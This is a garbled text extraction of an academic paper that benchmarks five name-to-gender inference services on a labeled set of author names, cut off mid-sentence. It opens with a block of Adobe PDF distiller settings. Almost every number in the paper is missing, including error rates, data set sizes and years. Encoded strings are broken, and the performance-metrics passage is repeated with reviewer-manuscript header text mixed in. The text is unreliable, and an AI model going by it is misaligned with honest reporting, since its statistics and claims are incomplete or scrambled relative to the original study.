/preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted february accepted june published july corresponding author lucía santamaría, lucia.santamaria@ymail.com academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright santamaría and mihaljević distributed under creative commons cc-by . open access comparison and benchmark of name-to- gender inference services lucía santamaría ,* and helena mihaljević ,* amazon development center, berlin, germany university of applied sciences, berlin, germany * these authors contributed equally to this work. abstract the increased interest in analyzing and explaining gender inequalities in tech, media, and academia highlights the need for accurate inference methods to predict a person’s gender from their name. several such services exist that provide access to large databases of names, often enriched with information from social media profiles, culture-specific rules, and insights from sociolinguistics. we compare and benchmark five name- to-gender inference services by applying them to the classification of a test data set consisting of , manually labeled names. the compiled names are analyzed and characterized according to their geographical and cultural origin. we define a series of performance metrics to quantify various types of classification errors, and define a parameter tuning procedure to search for optimal values of the services’ free parameters. finally, we perform benchmarks of all services under study regarding several scenarios where a particular metric is to be optimized. subjects data mining and machine learning, data science, databases, digital libraries keywords name-based gender inference, classification algorithms, performance evaluation, gender analysis, scientometrics, bibliometrics introduction quantitative measurements and large-scale analyses of social phenomena in relation to gender are gaining significance as tools to uncover areas of gender bias and inequality, and to ultimately foster women’s inclusion and advancement. algorithms that can infer the gender category from other features have thereby opened up new opportunities to enhance data previously lacking such information. examples include social media profiles, github contributors, and authors of scientific publications, the analysis of which regarding gender has led to a better understanding of women’s situation in domains such as tech (vasilescu, serebrenik & filkov, ), media (matias, szalavitz & zuckerman, ; macharia et al., ), and academic publishing (larivière et al., a; west et al., ; mihaljević-brandt, santamaría & tullney, ; bonham & stefan, b). particularly in the latter case of bibliometric studies, the most reliable piece of information available for guessing a gender is the name string of the author. the standard approach for name-to-gender inference is based upon querying large (and often openly available) name repositories, such as censuses, administration records, and universal or country-specific birth lists. occasionally, results are refined with name-forming rules for specific cultures or ethnicities. in the attempt to identify the gender of as many names as how to cite this article santamaría and mihaljević ( ), comparison and benchmark of name-to-gender inference services. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:lucia.santamaria@ymail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. possible, often a multi-step combination of database queries, insights from sociolinguistics, and manual corrections is performed. this leads to non-transparent processes for gender inference that might be troublesome to reproduce and almost impossible to test, compare, and transfer. recently, the plethora of self-labeled data arising from social media has been successfully leveraged to improve the accuracy and specificity of methods based on querying compiled lists of names. this input has given rise to a handful of free and paid web services that infer gender from name strings. they usually gather data from manifold sources and profit from a greater degree of diversity, notably in regard to the origin of names, thus becoming a good choice for analyses outside of a national context. access to such services is typically granted through apis, turning gender inference on large corpora into a fast, reliable, and cost-effective process. using them in large-scale analyses is tempting due to their accuracy and availability; nonetheless, some caveats may apply, as the underlying data sources are frequently closed and thus not necessarily reliable nor verifiable. it is perhaps no surprise that, with few exceptions, the majority of research that uses name-based gender assignment does not evaluate the chosen method nor justifies the decision to use particular data sources and inference methodologies. furthermore, only a handful of studies have attempted to compare different approaches and provide solid groundwork for the choice of a given tool. we intend to fill this gap by presenting a comprehensive benchmark and comparison of several available gender inference services applied to the identification of names stemming from the academic publishing community. we evaluate web services gender api, genderize.io, nameapi, namsor and python package gender-guesser, five popular and commonly used methods for the problem at hand. all services are able to handle an international set of names and are thus singularly valuable for bibliographic analyses. after describing the services broken down by several decision-critical properties, such as data sources, accessibility, and cost, we test each of them on a manually labeled data set consisting of , names, which we make publicly available to interested researchers working on this topic (mihaljević & santamaría, ). several metrics of relevance for the classification problem are defined, distinguishing between misclassifications, i.e., assignments of the wrong gender to a name, and cases for which it is not possible to predict a gender, denominated non-classifications. to optimize for the metrics we perform repeated, cross-validated, randomized searches over the free parameters of the services. for gender api, genderize.io, and namsor we report error rates under % for inaccuracies including non-classifications, under the constraint that the misclassification error amounts to a maximum of %. the three services also achieve less than % error for misclassifications when imposing that at least % of all names be assigned a gender. gender api is in general the best performer in our benchmarks, followed by namsor. the cultural context of a name is known to have an impact on gender inference; to assess its importance we have used namsor’s origin api to predict the most likely origin of the names and split our analysis with respect to this facet. as expected, the less confident predictions occur for names of asian origin. we quantify the effect of the names’ santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. provenience on the results of the surveyed gender assignment services; overall, gender api outperforms all others for asian names as well. to the best of our knowledge, this is the most comprehensive comparison of gender assignment algorithms for the field of bibliometric analyses performed to date. the results of our analysis are meant to be the basis for further claims of gender assignment accuracy in future studies on the topic. related work bibliometric studies based on systematic assignment of gender with the purpose of analyzing specific aspects of the academic landscape have been conducted for at least a decade. mozaffarian & jamali ( ) studied the productivity of iranian women in science by analyzing over , publications by iranian authors from , taken from wos. gender inference was done manually, resorting to an internal list of iranian academics and to internet searches. while not scalable, this approach showed that a high degree of familiarity with names from a particular country greatly aids the gender inference task. the article reported lower productivity of iranian female authors with respect to their male counterparts. with a much broader scope, frietsch et al. ( ) considered patent applications from european countries between and and publications in eight scientific areas from to , extracted from scopus. comprehensive and country-specific lists of names collected, post-processed, and tested by naldi et al. ( ) were applied to assign a gender to inventors and authors. the analyzed data set comprised almost , , inventors and , authors from over , publications, after rejecting over % of names that could not be assigned a definite gender. findings included stark national differences in female contributions, with central european countries being the most prone to exhibit a wide gender gap. recently, various studies have focused on large-scale, scalable bibliometric analyses of academic publications in relation to gender. west et al. ( ) analyzed over , , publications from jstor, a digital library corpus in science and humanities. they could assign a gender to % of authors with full first names by using data from the us social security administration records. their analysis showed that authorships by women are not evenly distributed over the dimensions time, field, coauthorship, and authorship position. a similar approach was followed by larivière et al. ( a), who resorted to both universal and country-specific sources such as the us and quebec censuses, wikiname portal, wikipedia, and various internet sites to assign a gender to all articles between and indexed in wos. this resulted in more than , , articles and over , , authorship instances, % of which could be assigned a gender, provided a full first name was available. they reported significant gender disparities, such as fewer citations for articles with women in dominant author positions, as well as underrepresentation of women as first authors. analogous findings, but restricted to mathematics, were reported by mihaljević-brandt, santamaría & tullney ( ), who analyzed over , , publications from bibliographic service zbmath between and . using the names list from michael ( ), they could assign a gender to % of all authorship instances. most recently, holman, stuart-fox & hauser ( ) estimated the gender gap in stemm santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. disciplines with help of the pubmed and arxiv databases. thirty-six million authors with publications over the last years were assigned a gender using genderize.io, which is one of the services that we evaluate. their results confirm previously reported high variations of the gender gap across countries. furthermore, according to their data model, gender parity won’t be reached during this century in various fields, including mathematics, physics, and computer science. it is worth mentioning that all four above-mentioned studies performed some kind of validation of their gender inference methods, yet there is room for improvement regarding assessment of manual gender labels, data size, or reproducibility. for instance, holman, stuart-fox & hauser ( ) estimate their gender misclassification rate to be . % based on a collection of manually labeled author names via web searches. considering the expected name variance, an extrapolation of the error estimate to the entire data set does not seem reliable. despite its importance for estimating the error rate on gender assignments, only a few studies are devoted to comparing different gender inference tools. vanetta ( ) tested and compared four gender assignment methods (beauvoir, sexmachine, genderpredictor, and genderize.io) on a control group provided by a government office and consisting of over first names. no claims were made as to which one of the services was better, arguing that different purposes may pose different requirements to the services. karimi et al. ( ) used the test set from larivière et al. ( a) to evaluate precision, recall and accuracy of several methods, including data from various censuses, genderize.io, face recognition algorithm face++, and two novel approaches consisting of mixing the predictions of the latter two. they reported improved accuracy of the mixed methods, noting that the quality of the assignments depended on country and was worse for non- western regions. the brevity of the paper prevents an extended discussion regarding the definition of the quality metrics, particularly in the handling of the predicted unknowns. at any rate, face recognition techniques clearly hold potential, albeit they must be used with caution in view of their likely intrinsic bias, e.g., towards darker-skinned females (buolamwini, ). similarly, equating country of residence with regional origin of a name does not seem to be a well suited assumption, given that academics often move internationally. holman, stuart-fox & hauser ( ) also query genderize.io with the country of affiliation, potentially incurring the same bias. a more extensive comparison is that of wais ( ), who revisited the methods and results of larivière et al. ( a) and west et al. ( ), with the additional introduction of the r package genderizer based on the genderize.io service. to compare the three approaches, a common test data set was evaluated that contained , authorships of , articles manually labeled using internet searches. the results were compared in terms of the metrics described in ‘performance metrics’. the method based on genderize.io outperformed the others, at least with respect to metrics that focus on retrieving a gender for as many names as possible. the percentage of non-classifications was consequently the lowest. while genderize.io and genderizer seem to offer the best performance for gender prediction, the author points out the bias towards english names. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison table showing relevant features for the gender inference services under study. note that although gender api does provide a specific api end point for handling surnames, our results employ the version that does not make use of them. gender api gender-guesser genderize.io nameapi namsor database size (january ) , , , , , , , regular data updates yes no yes yes yes handles unstructured full name strings yes no no yes no handles surnames yes no no yes yes handles non-latin alphabets partially no partially yes yes implicit geo-localization no no no yes yes assignment type probabilistic binary probabilistic probabilistic probabilistic free parameters accuracy, samples – probability, count confidence scale open source no yes no no no api yes no yes yes yes monthly free requests unlimited , , , monthly subscription cost ( , requests/month) ¤ free ¤ ¤ ¤ provider gender-api.com israel saeta pérez casper strømgren optimaize gmbh namsor sas recently, bonham & stefan ( b) have published an analysis of female underrepre- sentation in the field of computational biology, for which they performed a preliminary comparison of three gender assignment tools (bonham & stefan, a). the methods tested were the python package genderdetector and web apis genderize.io and gender api. after inferring the gender of , names they ultimately chose gender api for its superior coverage. they did not compute further metrics to validate their election. lastly, a crucial discussion of the benefits as well as ethical concerns when using gender inference methods was posed in matias ( ), which presented a multitude of examples of meaningful projects that have applied such tools to various data sources. links to evaluations and comparisons of name-based gender inference services, including the open gender tracker, which the author co-developed, were provided as well. methods overview of surveyed services we compare five different services for inferring gender from name strings that are among the methods most frequently employed to perform gender assignments in the field of bibliometric studies. several of them are broadly used by organizations and companies in the private sector as well. table showcases key characteristics; below we briefly describe each of them. gender api gender api (https://gender-api.com/), a gender inference service launched in , offers a standard first name search with capability to handle double names. furthermore, the api allows queries with a full name, which is internally split into first and last. the service currently supports countries, although it cannot geo-localize a full name per se. its api santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://gender-api.com/ http://dx.doi.org/ . /peerj-cs. other python wrappers of the same data are genderator and sexmachine, but they are mostly unsupported and not python - compatible. accepts extra parameters for localized queries though, namely country code, ip address, and browser locale. the response contains gender assignments male, female, or unknown, plus confidence parameters samples and accuracy. the former is the number of database records matching the request, while the latter determines the reliability of the assignment. the service is built upon a combination of data from multiple sources, partially from publicly available governmental records combined with data crawled from social networks. each name has to be verified by different sources to be incorporated. the service is overall reliable, with its cloud-based infrastructure providing an availability of . %. python-package gender-guesser python package gender-guesser (https://pypi.python.org/pypi/gender-guesser/) implements a wrapper around the names data described in michael ( ), which was made available in michael ( ) . the data set comprises over , names with gender assignments unknown (name not found), andy (androgynous), male, female, mostly_male, or mostly_female. additionally, the approximate frequency of each name per country is provided, and the gender request can be made with an extra location parameter for better accuracy. the dictionary of names was published a decade ago and has not been updated since, which limits the usefulness of both the package and its underlying data source. on the other hand, the gender assignment of this collection is presumed to be of high quality, with manual checks by native speakers of various countries. genderize.io online service genderize.io (https://genderize.io/), created in august , attempts to infer the gender of a first name. the response is either male, female, or none, plus two additional confidence parameters, count and probability, representing the number of data entries used to calculate the response and the proportion of names with the gender returned in the response. the underlying data is collected from social networks across countries and languages. although the service does not geo-localize names automatically, it does accept two optional parameters, location_id and language_id, for more qualified guesses. the providers do not state the sources employed, hence the reliability of the data is difficult to assess. an api and extensions to various languages are available. there are no guarantees about uptime; the service might not be reliable enough for use in critical applications. nameapi nameapi (https://www.nameapi.org/) is a free and paid service platform to work with names. it provides functionality in the form of web services to do name parsing, genderizing, matching, formatting, and others. for our benchmark we have concentrated on the genderizing service only. its underlying data sources are dictionaries with all parts of names extracted from census publications, birth lists, and telephone books from over countries. original spellings in non-latin scripts (including transcriptions and transliterations) are also recorded. the gender response can be male, female, neutral, unknown, or indeterminable, weighted by the confidence parameter. the service is able to infer the most likely origin of the name, thus allowing to apply language-specific rules and to geo-localize names whose gender depend on the culture. the service aims to achieve santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://pypi.python.org/pypi/gender-guesser/ https://genderize.io/ https://www.nameapi.org/ http://dx.doi.org/ . /peerj-cs. high uptime, with . % availability. nameapi provides an api accessible either from a free or a paid account, with credits that can be purchased on a one-time or monthly subscription basis. namsor namsor (http://www.namsor.com/) is a classifier of personal names by gender, country of origin, or ethnicity. the service is able to recognize the linguistic or cultural origin of names, thus allowing it to correctly infer the gender from the first and last name in cases that can be male or female depending on their provenience. namsor claims to cover all languages, alphabets, countries, and regions. the underlying data consists of . million unique given names extracted from baby name statistics per country, plus sociolinguistic information (morphology, language, ethnicity, etc.) to extract semantics, which allows it to predict gender for complex cases. the namsor gender api returns male, female, or unknown values, plus a parameter scale ranging from − to + to reflect the certainty that a name is male or female, respectively. a basic api for structured names is available for free, whereas the freemium version accepts unstructured strings and offers higher performance and precision. namsor’s origin api recognizes the likely cultural provenience of personal names in any alphabet, returning a primary and an alternative potential country of origin, as well as a score to qualify the trustworthiness of the assignment. it is based on a proprietary onomastics model which uses linguistic and cultural information. assemblage of test data we have gathered, revised, and combined human-annotated author-gender data sets used in various bibliometric studies to date, which we describe below. zbmath randomly selected authors from the bibliographical records of the mathematical publications service zbmath (https://zbmath.org/), sampled in ignoring names that contained only initials. these authors were manually labeled as ‘female’, ‘male’ or ‘unknown’ by mihaljević-brandt, santamaría & tullney ( ) using internet queries to obtain gender information. more precisely, the concrete person behind an author’s name was identified by gathering author profile information from zbmath and other bibliographic databases. then, university websites, wikipedia articles, and similar online sources were searched for gender-indicating titles (mr, mrs, etc.) and personal pronouns corresponding to the according person. the zbmath data set consists of names ( male, female, unknown). genderizer sample data sets from the genderizer package (https://github.com/kalimu/genderizer), authorships and titles that correspond to records of articles of biographical-items or items- about-individual type, respectively, from all fields of study, published from to and drawn from wos. as described in wais ( ), the names in both data sets were manually coded as ‘female’, ‘male’, or ‘unknown’ based on results from internet queries using the authors’ full names, affiliations, biographies, mentions in the press, and photos. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.namsor.com/ https://zbmath.org/ https://github.com/kalimu/genderizer http://dx.doi.org/ . /peerj-cs. a name was deemed ‘unknown’ if the coder was not certain enough based on the found information. we have applied a series of preprocessing steps to this data, namely removal of duplicates and names containing only initials. for the ‘titles’ data set we have used a naive named-entity extractor based on python’s package nltk’s pos tagger to identify names in the articles’ titles. generally, ner tasks are better solved with more potent packages, such as stanford’s corenlp. in this case though, the small size of the data set allowed for a manual check of all extracted names to guarantee correctness. after revising both sources, genderize_r_titles and genderize_r_authors, the data set consists of , names ( male, female, unknown). pubmed data set from filardo et al. ( ), built by querying the six journals with highest jcr impact factor in in the category medicine, general & internal for original research articles between and . incidentally, this data has also been used to tune the gender assignment methods of bonham & stefan ( b). filardo et al. ( ) determined the gender of the first author of each of the articles as ‘female’, ‘male’, or ‘unknown’ by first inspecting the forename. if this was judged to be insufficient to assign a gender, the authors searched institutional websites, social media accounts, photographs, and biographical paragraphs to gather more information. we further removed duplicates and records with empty first names or initials only. the pubmed data set consists of , names ( , male, female, unknown). wos data set produced for the validation study reported in larivière et al. ( b) that informed the findings of larivière et al. ( a), consisting of records from the wos database covering all publications from to included in science citation index expanded, the social sciences citation index, and the arts and humanities citation index. from each of the five categories ‘initials’, ‘unknown’, ‘unisex’, ‘male’, and ‘female’, , names were randomly sampled and associated with a specific country, institution, and, in some cases, an email address. this information was used by larivière et al. ( a) to locate biographical information and, based on that, manually assign a gender. from this data set of , names we have further removed records from the ‘initials’ subset and duplicates with respect to the previous data sets. the final wos data set consists of , names ( , male, , female, , unknown). after concatenating all data sets we ran a sanity check consisting of finding names that had been consistently misclassified by all gender inference services, and performed manual corrections to amend incorrectly assigned labels. in total, we double-checked author names and manually changed the gender label of of them by searching preferably for personal pronouns, gender-indicating titles, and, ultimately, photos in university websites, professional social media sites, conference web pages, and similar sources. all undertaken preprocessing steps can be found in mihaljević & santamaría ( ). our final data set consists of , names ( , male, , female, , unknown), split into three components: first, middle, and last name. about % of them contain a middle name, and the number of unique combinations of first and middle name in the data santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. namsor provides a diaspora api to address onomastic classification for countries with historically high immigration rates like the usa. table examples of the geographical origins of names as inferred by namsor’s origin api. full_name gender source country top_region sub_region score maria bortolini f wos italy europe southern europe . liew woei kang m pubmed china asia eastern asia . sirin yasar f wos turkey asia western asia . set is , . the most common male names are ‘john’, ‘david’, and ‘michael’; the most frequent female ones are ‘susan’, ’christine’, ‘laura’, and ‘anne’. we point out that we use ‘female’ and ‘male’ as categories solely because the evaluated services operate under the gender binary paradigm; our concerns to this approach are spelled out in the discussion. to the best of our knowledge this collection is the largest sample of labeled gender data corresponding to authors of academic publications to date. in order to promote further research on the topic, we make our data set available to interested researchers (mihaljević & santamaría, ). origin of the names the assembled data set described above does not include any information regarding the origin or geographic provenience of the persons’ names. it is well known that the cultural context is an important aspect affecting the reliability of gender inference methods. we thus seek to evaluate the geographical and cultural diversity of our data set as well as to measure the impact of the names’ origins on the performance of the surveyed services. as described above, namsor’s origin api is able to produce an anthroponomical classification of a personal name by allocating an onomastic class, i.e., a country, subregion, and region, to it. the inferred origin is reported in conjunction with a score that calibrates its reliability. according to namsor’s internal evaluations, for names from europe, asia, and africa the classifications with score > are trustworthy. note that the usa is not considered an onomastic class on its own but rather a melting pot of other ‘cultural origins’ such as ireland or germany (carsenat, ) . similarly, names from other parts of the americas are considered to be of (southern) european descent. table shows a few examples of the anthroponomical classifications produced by namsor’s origin api. we have applied namsor’s origin api to our collection of , names and are able to assign a provenience to % ( , ) of them that return a score above , and that we keep for further analysis. the service was queried in may . namsor estimates , names ( %) to be of european origin, , ( %) of asian, and ( %) of african provenience. we have split the analysis by the different data sources; results are displayed in fig. . the wos collection contains approximately % asian and % european names; given the fact that wos is larger than any of the other data subsets, this ensures a satisfactory representation of asian names in the whole test data set. for the other data sources, names of european origin clearly predominate, especially in the genderize_r subsets. in short, our data set shows a majority of european and asian names; understandably for a sample coming from scientific publishing, the proportion of african names is small. a more fine-grained geographical analysis focusing on countries, rather than regions, reveals that the names in our test data originate from countries; however, just of santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % % % wos pubmed genderize_r_titles genderize_r_authors zbmath europe asia africa figure geographical region of origin of the personal names from our test data set as inferred by namsor’s origin api. the colored bars show percentages split by data sources. the genderize_r data sets are the most eurocentric, whereas the wos collection is more balanced towards asian names. african names amount to at most % per data source, which reflects the shortage of scholarly authors from that region. full-size doi: . /peerjcs. /fig- them already cover % of the whole data set. the most frequent country of origin is the uk, followed by germany, china, and ireland. splitting the analysis among the five data sources confirms that both genderize_r datasets are very eurocentric: they have almost no asian countries among the top most frequent ones. they also show the lowest diversity, with the top three countries (uk, germany, and ireland) covering % of all names and the top covering %. on the contrary, the highest variability appears in the smallest data set zbmath, where the top three countries (germany, japan, and the uk) contain % of all names and the top cover %. the larger wos data set exhibits the best representation of asian origins: china, japan, and korea appear in positions st, rd, and th in terms of frequency. full figures and statistics can be found in our dedicated jupyter notebook in mihaljević & santamaría ( ). the analysis of cultural and geographical provenience of the personal names contained in our data set brings us to the conclusion that our collection is reasonably diverse and shows an acceptable variability with respect to origin, with the aforementioned caveats about african names. retrieval of gender assignments we have performed systematic queries to the services under study to obtain an inferred gender for all records in our test data set. all queries were performed in mid december . depending on their peculiarities, we sent different requests to the various apis. concretely, genderize.io and gender-guesser do not handle last names, therefore we queried using first and middle names only. when both a first and a middle name were present we tried their combinations (e.g., ‘jae il’, alternatively ‘jae-il’). if no response was obtained, only the first name was used (e.g., ‘jae’). the free namsor api requires the name to be structured as split forename(s) and last name. gender api offers two distinct end points, one for forename(s) only and another capable of splitting unstructured full name strings. we evaluated both methods in our benchmark and found that the former performs notably better, thus we santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. report results for that variant. nameapi accepts unstructured strings per se. we tested it using the full name string and the forename(s) only, for better comparison with the name splitting mechanism of gender api. however, in this case querying with the full name string achieves significantly better results, hence we report the performance of nameapi for this variant. performance metrics name-based gender inference can be considered as a classification problem, and as such there exist plenty of metrics to measure the performance of a classifier. the choice of performance indicators needs to be suitable for the problem at hand and is usually a non-trivial task in the development of data-based algorithms. for further background readings related to classification and learning algorithms in general, such as training and testing, cross-validation, typical error estimates and statistical significance testing, see e.g., hastie, tibshirani & friedman ( ) and japkowicz & shah ( ). the names in our evaluation data set have been manually labeled as ‘female’, ‘male’, or ‘unknown’. recall that those labeled as ‘unknown’ refer to individuals for whom it was not possible to find sufficient gender-related information online. therefore the class ‘unknown’ is rather a heterogeneous label applied to people with either very common names or those that avoid providing much personal information online. in particular, it is not a ‘gender class’ in any suitable sense, and cannot be included appropriately in quantitative evaluations using performance metrics. in what follows, we will not make use of the items with manual label ‘unknown’ for any of our calculations and results, working instead with the , names in our data set which possess a defined gender label. (for a discussion of ethical considerations of name-based gender inference methods and the methodological shortcomings of such approaches, see the ‘discussion’.) on the other hand, the services evaluated here do return, along with the responses ‘female’ and ‘male’, at least a label ‘unknown’ for the unidentified cases. hence, in terms of the true labels we are dealing with a binary classification problem, while the predictions contain one or more extra output classes. this makes it difficult to pose name-based inference as a standard classification problem and to utilize commonly used metrics such as precision and recall. in our case it makes sense to work instead with metrics derived from the confusion matrix defined as follows: recall that those labeled as ‘unknown’ refer to individuals for whom it was not possible to find sufficient gender-related information online. therefore the class ‘unknown’ is rather a heterogeneous label applied to people with either very common names or those that avoid providing much personal information online. in particular, it is not a ‘gender class’ in any suitable sense, and cannot be included appropriately in quantitative evaluations using performance metrics. in what follows, we will not make use of the items with manual label ‘unknown’ for any of our calculations and results, working instead with the , names in our data set which possess a defined gender label. (for a discussion of ethical considerations of name-based gender inference methods and the methodological shortcomings of such approaches, see the discussion.) on the other hand, the services evaluated here do return, along with the responses ‘female’ and ‘male’, at least a label ‘unknown’ for the unidentified cases. hence, in terms of the true labels we are dealing with a binary classification problem, while the predictions contain one or more extra output classes. this makes it difficult to pose name-based inference as a standard classification problem and utilize commonly used metrics such as precision and recall. in our case it makes sense to work instead with metrics derived from the confusion matrix defined as follows: predicted class male female unknown tr ue cl as s male mm mf mu female fm ff fu let us introduce the following nomenclature for the components of the confusion matrix, which in general we will refer to as assignments: elements in the diagonal (mm and ff) are the correct classifications, while elements outside it (mf and fm) are thus misclassifications. the sum of both can be simply referred to as classifications. consequently, elements mu and fu represent non-classifications, since the algorithm fails at predicting one of the classes ‘male’ or ‘female’. all mistakes, both misclassifications and non- classifications, are included under the term inaccuracies. based on the confusion matrix, wais ( ) introduced four performance metrics: errorcoded = fm + mf + mu + fu mm + fm + mf + ff + mu + fu , errorcodedwithoutna = fm + mf mm + fm + mf + ff , nacoded = mu + fu mm + fm + mf + ff + mu + fu , errorgenderbias = mf − fm mm + fm + mf + ff . the errors above are to be interpreted as follows: errorcoded treats a non-classification as a regular er- ror and penalizes it in the same way as a misclassification, therefore it encodes the fraction of inaccuracies over the total number of assignments; errorcodedwithoutna measures the share of misclassifications over the total number of classifications while ignoring non-classifications; nacoded computes the proportion of non-classifications over the total number of assignments; errorgenderbias estimates the direction of the bias in gender prediction, indicating whether there are more females misclassified as male, or vice versa. if positive, then the estimated number of women is higher than in the real data. depending on the concrete usage of an algorithm, these metrics can be suitable or not. for instance, if not being able to assign a gender to a large number of names is acceptable while high prediction accuracy is essential, errorcodedwithoutna should be minimized. for most purposes, however, it is desirable to infer the gender for as many names as possible without treating non-classifications as a regular error. for this purpose we have defined two extensions of the metrics above. let w ∈ [ , ]. we define the weightederror as weightederrorw = fm + mf + w ∗(mu + fu) mm + fm + mf + ff + w ∗(mu + fu) . for w = the weightederror equals errorcodedwithoutna and for w = we recover errorcoded exactly. for < w < we define a metric which penalizes misclassifications more than non-classifications. to clarify this further, consider the following examples of confusion matrices: / peerj comput. sci. reviewing pdf | (cs- : : : : :new may ) manuscript to be reviewedcomputer science let us introduce the following nomenclature for the components of the confusion matrix, which in general we will refer to as assignments: elements in the diagonal (mm and ff) are the correct classifications, while elements outside it (mf and fm) are thus misclassifications. the sum of both can be simply referred to as classifications. consequently, elements mu and fu represent non-classifications, since the algorithm fails at predicting one of the classes santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘male’ or ‘female’. all mistakes, both misclassifications and non-classifications, are included under the term inaccuracies. based on the confusion 